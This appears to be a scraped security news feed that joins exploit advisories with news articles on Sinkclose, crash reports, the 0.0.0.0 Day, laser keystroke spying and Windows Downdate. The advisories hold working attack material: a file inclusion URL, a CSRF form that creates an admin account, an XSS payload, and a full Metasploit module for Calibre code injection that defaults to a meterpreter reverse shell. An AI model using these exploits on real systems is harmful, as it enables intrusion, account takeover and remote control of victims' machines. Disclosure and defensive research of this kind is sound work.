Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

Employee Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employee Management System v1.0 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : employee_akpoly/Admin/add-admin.php.

[+] http://127.0.0.1/employee_akpoly/Admin/add-admin.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Add Admin</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/employee_akpoly/Admin/add-admin.php" method="POST" enctype="multipart/form-data">  
        <label for="txtusername">Username:</label>  
        <input type="text" id="txtusername" name="txtusername" required><br><br>

        <label for="txtfullname">Full Name:</label>  
        <input type="text" id="txtfullname" name="txtfullname" required><br><br>

        <label for="txtpassword">Password:</label>  
        <input type="password" id="txtpassword" name="txtpassword" required><br><br>

        <label for="txtphone">Phone Number:</label>  
        <input type="text" id="txtphone" name="txtphone" required><br><br>

        <label for="avatar">Avatar:</label>  
        <input type="file" id="avatar" name="avatar" accept="image/*"><br><br>

        <button type="submit" name="btncreate">Create</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employee Management System 1.0 Cross Site Request Forgery

E-Commerce Site using PHP PDO version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : E-Commerce Site using PHP PDO v1.0 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html                                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/ips-lb.net/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

E-Commerce Site Using PHP PDO 1.0 Cross Site Scripting

Researchers warn that a bug in AMD’s chips would allow attackers to root into some of the most privileged portions of a computer—and that it has persisted in the company’s processors for decades.

Security flaws in your computer's firmware, the deep-seated code that loads first when you turn the machine on and controls even how its operating system boots up, have long been a target for hackers looking for a stealthy foothold. But only rarely does that kind of vulnerability appear not in the firmware of any particular computer maker, but in the chips found across hundreds of millions of PCs and servers. Now security researchers have found one such flaw that has persisted in AMD processors for decades, and that would allow malware to burrow deep enough into a computer's memory that, in many cases, it may be easier to discard a machine than to disinfect it.

At the Defcon hacker conference tomorrow, Enrique Nissim and Krzysztof Okupski, researchers from the security firm IOActive, plan to present a vulnerability in AMD chips they're calling Sinkclose. The flaw would allow hackers to run their own code in one of the most privileged modes of an AMD processor, known as System Management Mode, designed to be reserved only for a specific, protected portion of its firmware. IOActive's researchers warn that it affects virtually all AMD chips dating back to 2006, or possibly even earlier.

Nissim and Okupski note that exploiting the bug would require hackers to already have obtained relatively deep access to an AMD-based PC or server, but that the Sinkclose flaw would then allow them to plant their malicious code far deeper still. In fact, for any machine with one of the vulnerable AMD chips, the IOActive researchers warn that an attacker could infect the computer with malware known as a “bootkit” that evades antivirus tools and is potentially invisible to the operating system, while offering a hacker full access to tamper with the machine and surveil its activity. For systems with certain faulty configurations in how a computer maker implemented AMD's security feature known as Platform Secure Boot—which the researchers warn encompasses the large majority of the systems they tested—a malware infection installed via Sinkclose could be harder yet to detect or remediate, they say, surviving even a reinstallation of the operating system.

“Imagine nation-state hackers or whoever wants to persist on your system. Even if you wipe your drive clean, it's still going to be there,” says Okupski. “It's going to be nearly undetectable and nearly unpatchable.” Only opening a computer's case, physically connecting directly to a certain portion of its memory chips with a hardware-based programming tool known as SPI Flash programmer and meticulously scouring the memory would allow the malware to be removed, Okupski says.

Nissim sums up that worst-case scenario in more practical terms: “You basically have to throw your computer away.”

In a statement shared with WIRED, AMD acknowledged IOActive's findings, thanked the researchers for their work, and noted that it has “released mitigation options for its AMD EPYC datacenter products and AMD Ryzen PC products, with mitigations for AMD embedded products coming soon.” (The term “embedded,” in this case, refers to AMD chips found in systems such as industrial devices and cars.) For its EPYC processors designed for use in data-center servers, specifically, the company noted that it released patches earlier this year. AMD declined to answer questions in advance about how it intends to fix the Sinkclose vulnerability, or for exactly which devices and when, but it pointed to a full list of affected products that can be found on its website's security bulletin page.

In a background statement to WIRED, AMD emphasized the difficulty of exploiting Sinkclose: To take advantage of the vulnerability, a hacker has to already possess access to a computer's kernel, the core of its operating system. AMD compares the Sinkhole technique to a method for accessing a bank's safe-deposit boxes after already bypassing its alarms, the guards, and vault door.

Nissim and Okupski respond that while exploiting Sinkclose requires kernel-level access to a machine, such vulnerabilities are exposed in Windows and Linux practically every month. They argue that sophisticated state-sponsored hackers of the kind who might take advantage of Sinkclose likely already possess techniques for exploiting those vulnerabilities, known or unknown. “People have kernel exploits right now for all these systems,” says Nissim. “They exist and they're available for attackers. This is the next step.”

IOActive researchers Krzysztof Okupski (left) and Enrique Nissim.Photograph: Roger Kisby

Nissim and Okupski's Sinkclose technique works by exploiting an obscure feature of AMD chips known as TClose. (The Sinkclose name, in fact, comes from combining that TClose term with Sinkhole, the name of an earlier System Management Mode exploit found in Intel chips in 2015.) In AMD-based machines, a safeguard known as TSeg prevents the computer's operating systems from writing to a protected part of memory meant to be reserved for System Management Mode known as System Management Random Access Memory or SMRAM. AMD's TClose feature, however, is designed to allow computers to remain compatible with older devices that use the same memory addresses as SMRAM, remapping other memory to those SMRAM addresses when it's enabled. Nissim and Okupski found that, with only the operating system's level of privileges, they could use that TClose remapping feature to trick the SMM code into fetching data they've tampered with, in a way that allows them to redirect the processor and cause it to execute their own code at the same highly privileged SMM level.

“I think it's the most complex bug I've ever exploited,” says Okupski.

Nissim and Okupski, both of whom specialize in the security of low-level code like processor firmware, say they first decided to investigate AMD's architecture two years ago, simply because they felt it hadn't gotten enough scrutiny compared to Intel, even as its market share rose. They found the critical TClose edge case that enabled Sinkclose, they say, just by reading and rereading AMD's documentation. “I think I read the page where the vulnerability was about a thousand times,” says Nissim. “And then on one thousand and one, I noticed it.” They alerted AMD to the flaw in October of last year, they say, but have waited nearly 10 months to give AMD more time to prepare a fix.

For users seeking to protect themselves, Nissim and Okupski say that for Windows machines—likely the vast majority of affected systems—they expect patches for Sinkclose to be integrated into updates shared by computer makers with Microsoft, who will roll them into future operating system updates. Patches for servers, embedded systems, and Linux machines may be more piecemeal and manual; for Linux machines, it will depend in part on the distribution of Linux a computer has installed.

Nissim and Okupski say they agreed with AMD not to publish any proof-of-concept code for their Sinkclose exploit for several months to come, in order to provide more time for the problem to be fixed. But they argue that, despite any attempt by AMD or others to downplay Sinkclose as too difficult to exploit, it shouldn't prevent users from patching as soon as possible. Sophisticated hackers may already have discovered their technique—or may figure out how to after Nissim and Okupski present their findings at Defcon.

Even if Sinkclose requires relatively deep access, the IOActive researchers warn, the far deeper level of control it offers means that potential targets shouldn't wait to implement any fix available. “If the foundation is broken,” says Nissim, "then the security for the whole system is broken."

‘Sinkclose’ Flaw in Hundreds of Millions of AMD Chips Allows Deep, Virtually Unfixable Infections

One hacker solved the CrowdStrike outage mystery with simple crash reports, illustrating the wealth of detail about potential bugs and vulnerabilities those key documents hold.

When a bad software update from the security firm CrowdStrike inadvertently caused digital chaos around the world last month, the first signs were Windows computers showing the Blue Screen of Death. As websites and services went down and people scrambled to understand what was happening, conflicting and inaccurate information was everywhere. Rushing to understand the crisis, longtime Mac security researcher Patrick Wardle knew that there was one place he could look to get the facts: crash reports from computers impacted by the bug.

“Even though I am not a Windows researcher, I was intrigued by what was going on, and there was this dearth of information,” Wardle tells WIRED. “People were saying that it was a Microsoft problem, because Windows systems were blue-screening, and there were a lot of wild theories. But actually it had nothing to do with Microsoft. So I went to the crash reports, which to me hold the ultimate truth. And if you were looking there you were able to pinpoint the underlying cause long before CrowdStrike came out and said it.”

At the Black Hat security conference in Las Vegas on Thursday, Wardle made the case that crash reports are an underutilized tool. Such system snapshots give software developers and maintainers insight into possible problems with their code. And Wardle emphasizes that they can particularly be a fount of information about potentially exploitable vulnerabilities in software—for both defenders and attackers.

In his talk, Wardle presented multiple examples of vulnerabilities he has found in software when the app crashed and he combed through the report looking for the possible cause. Users can readily view their own crash reports on Windows, macOS, and Linux, and they're also available on Android and iOS, though they can be more challenging to access on mobile operating systems. Wardle notes that to glean insights from crash reports, you need a basic understanding of instructions written in the low-level machine code known as Assembly, but he emphasizes that the payoff is worth it.

In his Black Hat talk, Wardle presented multiple vulnerabilities he discovered simply by examining crash reports on his own devices—including bugs in the analysis tool YARA and in the current version of Apple's macOS operating system. In fact, when Wardle discovered in 2018 that an iOS bug caused apps to crash anytime they displayed the Taiwanese flag emoji, he got to the bottom of what was happening using, you guessed it, crash reports.

“We revealed conclusively that Apple had acquiesced to demands from China to censor the Taiwanese flag, but their censorship code had a bug in it—ridiculous,” he says. “My friend who originally observed this was like, ‘My phone is being hacked by the Chinese. Whenever you text me it crashes. Or are you hacking me?' And I said, ‘Rude, I wouldn’t hack you. And also, rude, if I did hack you, I wouldn’t crash your phone.’ So I pulled the crash reports to see what was going on.”

Wardle emphasizes that if he can find so many vulnerabilities just by looking at crash reports from his own devices and those of his friends, software developers need to be looking there, too. Sophisticated criminal actors and well-funded state-backed hackers alike are probably already getting ideas from their own crash reports. Over the years, news reports have indicated that intelligence agencies like the US National Security Agency do mine crash logs. Wardle points out that crash reports are also a valuable source of information for detecting malware, since they can reveal anomalous and potentially suspicious activity. The notorious spyware broker NSO Group, for example, would often build mechanisms into into their malware specifically to delete crash reports immediately upon infecting a device. And the fact that malware is often buggy makes crashes more likely and crash reports valuable to attackers as well for understanding what went wrong with their code.

“With crash reports, the truth is out there,” Wardle says. “Or, I guess, in there.”

Computer Crash Reports Are an Untapped Hacker Gold Mine

This Metasploit module exploits a Python code injection vulnerability in the Content Server component of Calibre version 6.9.0 through 7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',        'Description' => %q{          This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.        },        'License' => MSF_LICENSE,        'Author' => [          'Amos Ng', # Discovery & PoC          'Michael Heinzl', # MSF exploit        ],        'References' => [          [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],          [ 'CVE', '2024-6782']        ],        'DisclosureDate' => '2024-07-31',        'Platform' => ['win', 'linux', 'unix'],        'Arch' => [ ARCH_CMD ],        'Payload' => {          'BadChars' => '\\'        },        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              },              'Type' => :win_fetch            }          ],          [            'Linux Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080)      ]    )  end  def check    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path)      })    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError      return CheckCode::Unknown    end    if res && res.code == 200      data = res.body.to_s      pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/      version = data.match(pattern)      if version[1].nil?        return CheckCode::Unknown      else        vprint_status('Version retrieved: ' + version[1].to_s)      end      if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0'))        return CheckCode::Appears      else        return CheckCode::Safe      end    else      return CheckCode::Unknown    end  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    print_status('Sending payload...')    exec_calibre(cmd)    print_status('Exploit finished, check thy shell.')  end  def exec_calibre(cmd)    payload = '['\    '["template"], '\    '"", '\    '"", '\    '"", '\    '1,'\    '"python:def evaluate(a, b):\\n '\     'import subprocess\\n '\      'try:\\n  '\        "return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\      'except Exception:\\n  '\        "return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\    ']'    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'data' => payload,      'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')    })    if res && res.code == 200      print_good('Command successfully executed, check your shell.')    elsif res && res.code == 400      fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')    end  endend

Calibre 7.15.0 Python Code Injection

Windows Firewall Control version 6.11.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: Microsoft Windows Firewall Control 6.11.0 - UnquotedService Path# Date: 2024-08-06# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor Homepage: http://www.binisoft.org# Software Link: http://www.binisoft.org# Version: 6.11.0# Tested on: Windows 10 Pro x641. Description:Windows Firewall Control lacks of the quotes in filepath, causing it to bea potential vector of privilege escalation attack.To properly exploit this vulnerability, the local attacker must insert anexecutable file in the path of the service. Upon service restart or systemreboot, the malicious code will be run with elevated privileges.2. POCC:\>sc qc "wfcs"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: wfcs        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\Windows FirewallControl\wfcs.exe"        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Windows Firewall Control        DEPENDENCIES       : MpsSvc        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name:  Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft Corporation

Windows Firewall Control 6.11.0 Unquoted Service Path

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.
The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky

Vulnerability / Browser Security

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.

The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky said.

The Israeli application security company said the implications of the vulnerability are far-reaching, and that it stems from the inconsistent implementation of security mechanisms and a lack of standardization across different browsers.

As a result, a seemingly harmless IP address such as 0.0.0.0 could be weaponized to exploit local services, resulting in unauthorized access and remote code execution by attackers outside the network. The loophole is said to have been around since 2006.

0.0.0.0 Day impacts Google Chrome/Chromium, Mozilla Firefox, and Apple Safari that enables external websites to communicate with software that runs locally on MacOS and Linux. It does not affect Windows devices as Microsoft blocks the IP address at the operating system level.

Particularly, Oligo Security found that public websites using domains ending in ".com" are able to communicate with services running on the local network and execute arbitrary code on the visitor's host by using the address 0.0.0.0 as opposed to localhost/127.0.0.1.

It's also a bypass of Private Network Access (PNA), which is designed to prohibit public websites from directly accessing endpoints located within private networks.

Any application that runs on localhost and can be reached via 0.0.0.0 is likely susceptible to remote code execution, including local Selenium Grid instances by dispatching a POST request to 0.0.0\[.\]0:4444 with a crafted payload.

In response to the findings in April 2024, web browsers are expected to block access to 0.0.0.0 completely, thereby deprecating direct access to private network endpoints from public websites.

"When services use localhost, they assume a constrained environment," Lumelsky said. "This assumption, which can (as in the case of this vulnerability) be faulty, results in insecure server implementations."

"By using 0.0.0.0 together with mode 'no-cors,' attackers can use public domains to attack services running on localhost and even gain arbitrary code execution (RCE), all using a single HTTP request."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

0.0.0.0 Day: 18-Year-Old Browser Vulnerability Impacts MacOS and Linux Devices

Hacker Samy Kamkar is debuting his own open source version of a laser microphone—a spy tool that can invisibly pick up the sounds inside your home through a window, and even the text you’re typing.

In a famous scene from the 1992 movie _Sneakers_, a hacker classic, the main characters park a surveillance van across the street from their target's office and point a telephoto lens through his window—only to find that their view of his computer keyboard is blocked by the surprise entrance of his love interest at the precise moment when he types his password. The surveillance team ends up watching and rewatching their partially obstructed VHS video of his keystrokes, bickering comically about the layout of a QWERTY keyboard.

Today, with a few decades of surveillance tech advancements and some clever feats of physics, all it would take to grab that password—as well as anything typed on the computer, or, for that matter, every word spoken in the room—would be a well-aimed infrared laser.

At the Defcon security conference this weekend in Las Vegas, renowned hacker Samy Kamkar plans to debut his own DIY advances in a form of laser-based surveillance, demonstrating that he can point a laser that's invisible to the human eye at a faraway laptop, through a window, and detect the computer's vibrations to reconstruct virtually every character typed on it. The trick, which takes advantage of the subtle acoustics created by tapping different keys on a computer, works even without a view of the computer's keyboard, so long as the hacker has a line-of-sight view of any relatively reflective portion of the target laptop.

In the process of perfecting that light-based keystroke eavesdropping technique, Kamkar says he's also created what may well be one of the world's most high-fidelity implementations of a laser microphone—a tool that bounces a laser off a room's window to detect its vibrations and record all the sounds inside—or at least, one of the most advanced such laser microphones whose technical details have been publicly released. (Kamkar plans to publish the full schematics on his website and GitHub.) The result is an open-source spying setup that can, in various forms, potentially pick up virtually everything either typed or spoken aloud in a surveillance target's room.

Kamkar says he's been determined to build his own laser-based spy setup since he watched a Defcon talk 15 years ago, in which a pair of hackers demonstrated some rudimentary detection of keystrokes with a laser pointed at a laptop from across a room. “It blew my mind. ‘I want to do this,’” Kamkar says he remembers thinking. “But I also wanted to improve the attack. Can I make it work from outside, from far away? Can I do it with an infrared laser so the target can't see it? And can I also hear what's happening in the room, such as by bouncing the laser off a window?”

The answers: Yes to all the above. The video below shows an example of Kamkar's prototype setup–he tested it through different windows of his house with varying results—with his infrared laser outside pointed at his Macbook inside, where he's typing and listening to music.

Here's a sample of text he was able to recover in one case from his own typing, compared to the original:

Kamkar says that his keystroke spying trick works best when he can aim his laser at a spot on a laptop that reflects light—ideally a shiny metal or plastic spot on the laptop's case, such as a logo. “The Apple logo is nearly a mirror,” he says. “So that's a really good reflective surface.” The video clip below, captured with an infrared camera and steam to make the laser's path visible, shows Kamkar's infrared laser bouncing off that shiny Apple logo.

When it came to recording sounds inside a room, Kamkar was in some cases able to pick up music clearly, as in the first two samples below—though he found that double-paned glass produced far more muffled results, which you can hear in the third audio sample.

Neither of Kamkar's two laser-spying techniques are entirely new concepts: Both the keystroke-surveillance technique and the laser-based audio eavesdropping trick are essentially his own versions of a tool known as a laser microphone, a decades-old invention that bounces a laser off a surface and measures the reflected light to detect the target's vibrations—such as those caused by either key presses on a laptop's keyboard or someone's nearby voice.

For both of his laser-based techniques, however, Kamkar used his own engineering tricks and a few thousand dollars in hardware to significantly advance the fidelity of his optical eavesdropping. To reduce the noise created by ambient light when attempting to detect vibrations in his reflected infrared laser, for instance, he designed his laser microphone system to strobe on and off 400,000 times per second, picking up the reflected light through a lens so that the light hits a photo diode—or doesn't—depending on the target's vibrations. By using that 400-kilohertz frequency and measuring variances in the signal's amplitude just as an amplitude-modulated, or AM, radio does, Kamkar was able to later filter out everything other than that frequency to vastly reduce noise. He then amplified that signal and used a piece of hardware known as an upconverter to shift that AM radio signal to a higher frequency, so that it could be fed it into a software-defined radio—a digital, programmable radio capable of handling a far larger range of frequencies than a typical radio—to analyze it.

“I think I've created the first laser microphone that's actually modulated in the radio frequency domain,” Kamkar says. “Once I have a radio signal, I can treat it like radio, and I can take advantage of all the tools that exist for radio communication.” In other words, Kamkar converted sound into light into radio—and then back again into sound.

Samy Kamkar at his home workstation.Photograph: Roger Kisby

For his keystroke detection technique, Kamkar then fed the output of his laser microphone into an audio program called iZotopeRX to further remove noise and then an open source piece of software called Keytap3 that can convert the sound of keystrokes into legible text. In fact, security researchers have demonstrated for years that keystroke audio, recorded from a nearby microphone, can be analyzed and deciphered into the text that a surveillance target is typing by distinguishing tiny acoustic differences in various keys. One group of researchers has shown that relatively precise text can even be derived from the sounds of keystrokes recorded over a Zoom call.

Kamkar, however, was more interested in the 2009 Defcon demonstration in which security researchers Andrea Barisani and Daniele Bianco showed that they could use a simple laser microphone to roughly detect words typed on a keyboard, a trick that would allow long-distance line-of-sight spying. In that demo, the two Italian hackers only got as far as testing out their laser spying technique across the room from a laptop and generating a list of possible word pairs that matched the vibration signature they recorded.

Speaking to WIRED, Barisani says their experiment was only a “quick and dirty” proof of concept compared to Kamkar's more polished prototype. “Samy is brilliant, and there was a lot of room for improvement,” Barisani says. “I'm 100 percent sure that he was able to improve our attack both in the hardware setup and the signal processing.”

Kamkar’s laser spying kit: An infrared laser…Photograph: Roger Kisby

…attached to an oscilloscope’s signal generator, current controller, temperature controller, and amplifier power supply.Photograph: Roger Kisby

Kamkar's results do appear to be dramatically better: Some samples of text he recovered from typing with his laser mic setup and shared with WIRED were almost entirely legible, with only a missed letter every word or two; others showed somewhat spottier results. Kamkar's laser microphone worked well enough for detecting keystrokes, in fact, that he also tested using it to record audio in a room more generally, by bouncing his infrared laser off a window. It produced remarkably clear sound, noticeably better than other samples of laser microphone audio released online—at least among those recorded stealthily from a window's vibrations.

Of course, given that laser microphones have existed for decades, Kamkar admits he doesn't know what advancements the technology may have made in commercial implementations available to governments or law enforcement, not to mention even more secret, custom-built technologies potentially created or used by intelligence agencies. “I would assume they're doing this or something like it,” Kamkar says.

Unlike the creators of those professional spy tools, though, Kamkar is publishing the full schematics of his DIY laser microphone spy kit. “Ideally, I want the public to know everything that intelligence agencies are doing, and the next thing, too," Kamkar says. “If you don't know something is possible, you're probably not going to protect against it.”

Even knowing that Kamkar's silent, invisible, long-distance laser spy trick exists, how does anyone hide their secrets from it? He suggests that companies install double-paned or reflective glass. Some security device companies also sell protection devices that affix to windows and vibrate them to prevent laser microphone spying, and Kamkar concedes he hasn't tested his attack against those. But he also suggests a safer countermeasure: “Don't work on computers visible from a window,” he says. “Or just have dirty windows.”

Kamkar admits that beyond any idea of enabling or defeating surveillance, he was driven to develop his laser spying tricks mostly to test what was possible in the realm of physics-based hacking. More than a warning about any particular spy trick, he hopes his Defcon talk will inspire the conference's hacker audience to think more broadly about how information resonates through the real world in unexpected and exploitable ways, defying any simple model of computer security.

“You hit a key, it produces a sound that emanates in all directions. All the light hitting the laptop also vibrates at that frequency. The key then closes a circuit on the keyboard that generates electromagnetism and emits radio frequency in all directions,” Kamkar says. “The physical world screams secrets, and we have the ability to listen.” And if you don't, whoever's watching outside your window just might.

Watch How a Hacker’s Infrared Laser Can Spy on Your Laptop’s Keystrokes

Microsoft said it is developing security updates to address two loopholes that it said could be abused to stage downgrade attacks against the Windows update architecture and replace current versions of the operating system files with older versions.
The vulnerabilities are listed below -

CVE-2024-38202 (CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21302

Windows Security / Vulnerability

Microsoft said it is developing security updates to address two loopholes that it said could be abused to stage downgrade attacks against the Windows update architecture and replace current versions of the operating system files with older versions.

The vulnerabilities are listed below -

*   **CVE-2024-38202** (CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability
*   **CVE-2024-21302** (CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability

Credited with discovering and reporting the flaws is SafeBreach Labs researcher Alon Leviev, who presented the findings at Black Hat USA 2024 and DEF CON 32.

CVE-2024-38202, which is rooted in the Windows Backup component, allows an "attacker with basic user privileges to reintroduce previously mitigated vulnerabilities or circumvent some features of Virtualization Based Security (VBS)," the tech giant said.

It, however, noted that an attacker attempting to leverage the flaw would have to convince an Administrator or a user with delegated permissions to perform a system restore which inadvertently triggers the vulnerability.

The second vulnerability also concerns a case of privilege escalation in Windows systems that support VBS, effectively allowing an adversary to replace current versions of Windows system files with outdated versions.

The consequences of CVE-2024-21302 are that it could be weaponized to reintroduce previously addressed security flaws, bypass some features of VBS, and exfiltrate data protected by VBS.

Leviev, who detailed a tool dubbed Windows Downdate, said it could be used to turn a "fully patched Windows machine susceptible to thousands of past vulnerabilities, turning fixed vulnerabilities into zero-days and making the term 'fully patched' meaningless on any Windows machine in the world."

The tool, Leviev added, could "take over the Windows Update process to craft fully undetectable, invisible, persistent, and irreversible downgrades on critical OS components—that allowed me to elevate privileges and bypass security features."

Furthermore, Windows Downdate is capable of bypassing verification steps, such as integrity verification and Trusted Installer enforcement, effectively making it possible to downgrade critical operating system components, including dynamic link libraries (DLLs), drivers, and NT kernel.

The issues, on top of that, could be exploited to downgrade Credential Guard's Isolated User Mode Process, Secure Kernel, and Hyper-V's hypervisor to expose past privilege escalation vulnerabilities, as well as disable VBS, alongside features like Hypervisor-Protected Code integrity (HVCI).

The net result is that a completely patched Windows system could be rendered susceptible to thousands of past vulnerabilities and turn fixed shortcomings into zero-days.

These downgrades have an added impact in that the operating system reports that the system is fully updated, while simultaneously preventing the installation of future updates and inhibiting detection by recovery and scanning tools.

"The downgrade attack I was able to achieve on the virtualization stack within Windows was possible due to a design flaw that permitted less privileged virtual trust levels/rings to update components residing in more privileged virtual trust levels/rings," Leviev said.

"This was very surprising, given Microsoft's VBS features were announced in 2015, meaning the downgrade attack surface I discovered has existed for almost a decade."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows